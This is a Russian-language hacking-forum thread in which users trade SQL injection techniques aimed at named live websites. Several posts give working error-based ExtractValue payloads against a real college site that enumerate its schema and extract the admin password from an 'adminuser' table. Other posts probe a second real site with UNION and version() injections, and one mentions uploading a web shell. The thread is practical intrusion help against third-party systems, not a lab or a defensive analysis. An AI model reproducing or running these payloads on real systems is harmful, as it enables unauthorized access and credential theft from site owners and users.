Имеются в виду особые методы, позволяющие крутить слепую скулю почти с той же скроростью как и обычную если 5-ая ветка и вывод ошибок присутствуют https://forum.antichat.ru/showpost.php?p=1494443&postcount=11 https://forum.antichat.ru/showpost.php?p=1494440&postcount=10
2 bons: Я говорил про тулзу, насколько бы "крутые" методы при блинде не были, автоматизация процесса потребуется по любому. Да, кое-чего в тулзе нет. Но и так бесплатно и многопоточно. Уж извините.
Глупости. Мало того, что это не даёт абсолютно никаких знаний это ещё палит себя кучей запросов ненужных. В данном конкретном случае точно. Наверное проще получать ту же version() посылая один запрос вместо тупого, да ещё и неоптимального перебора. Как впрочем и остальные данные. Дампить всю базу что-бы получить акк админа это БРЕД. И неоправданное палево. Акк админа получается тремя запросами, а твой софт засрёт все логи
2 jokester: Скорее всего ты прав. Просто предложил человеку то, что у меня есть на текущий момент, включая первоначальные данные в качестве доказательства. Ничего другого адекватного ему, на мой взгляд сугубо, ему никто не предложил, кроме как "почитать что-то". Вместо того, чтобы новейшие и актуальнейшие методы продемонстрировать на конкретном примере по запросу автора вопроса - на конкретном сайте. Так что считаю в данном случае от меня пользы больше, чем от флуда выше. Блинда все-таки, а не очередной unhex(hex())
Это не блайнд в том-то всё и дело, а не предложил... Ну я например уже задолбался одно и то-же из пустого в порожнее, каждый божий день. Вот и не предложил. Читать ведь нехотят. А с твоим софтом и не захотят. Ок. Предложение: 1 http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x5c,(select group_concat(concat_ws(0x3a,table_schema,table_name,column_name)) from information_schema.columns+where+column_name+LIKE+CHAR(37,112,97,115,37) limit 1)))--+ 2 http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x5c,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='adminuser'+limit+1)))--+ Внимание интрига! Составьте третий запрос сами!!!
Ну нифига себе, до такого ведь обычному читателю этой темы труднова-то будет додуматься (включая меня). Так что конечно риспект Нет бы сразу Третий запрос наверное такой, извините мне мою наглость: Code: http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x5c,(select%20USR_Password%20from%20trccweb.adminuser%20limit%200,1)))--+ PS: Аплодирую стоя
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x3a,(version())))--+ гениально пашкела, что ты то пытался со своим запросом чудить, ведь мон было просто и так http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+and+substring(version(),1,1)=5/**/and/**/'1'='1
ну и чем твой запрос отличается от моего в принципе? Перестановкой and or 1=1? Смешно PS: А, понял, типо в твоем БОЛЕЕ очевидно, что 5-я ветка. Ну мейби, мейби, типо меньше глаза ломать. Но у меня зато не надо думать о кавычках и последовательности их закрытия, т.к. просто вызываем ошибку и дальше все стандартно (тут все-таки не диссер пишем, а наводим чела на хотя бы правильное решение. Ты еще шелл предложи ему залить просто так ) Вот джок молодец, я такого раньше и не слыхал.
Да-да, вы все правы несомненно. Пойду читать. Ибо, как я понял, просто помочь уже не катит, надо подсказать максимально эффективно. Но радует такая придирчивость, честно. Так правдами и неправдами действительно хоть чему-то научиться можно. PS: Только в бошку оно быстрее и надежнее влезает на живых примерах-то.
Root-access, шелл залить не получается, видимо права... может быть посредствам командной строке возможно это сделать?
Доброго времени суток. Есть проблема: http://vb.by/author.php?topic=11&author=9' Выдеёт: SQL request caused an error. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 http://vb.by/author.php?topic=11&author=-1 Выдаёт: SQL request caused an error. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND project_id<>1 AND project_id<>2 ORDER BY `date` DESC LIMIT 0, 15' at line 1 Пробую найти колво столбцов: http://vb.by/author.php?topic=11&author=-1+UNION+Select+1%20--%20 Страницу открывает, в исх коде в самом конце пришет: SQL request caused an error. The used SELECT statements have a different number of columns Потаюсь подобрать дальше: http://vb.by/author.php?topic=11&author=-1+UNION+Select+1,2%20--%20 Открывает страничку на которой только написано: SQL request caused an error. The used SELECT statements have a different number of columns Написал прогу чтобы вручную не перебирать, и сколько бы я не брал столюцов пишет different number of columns Что ето может быть такое???
не нужно гадать. http://vb.by/author.php?topic=11&author=1+and+1=2+union+select+version()--+ хорошо конечно знать новые методы, но может сначала поискать "обычный" вывод?
Так я искал, но такой запрос вызывает ошибку! Сорри я прост немного ещё в жтом не разьераюсь... учусь... Если есть возможность напиши плиз в аську 553226859
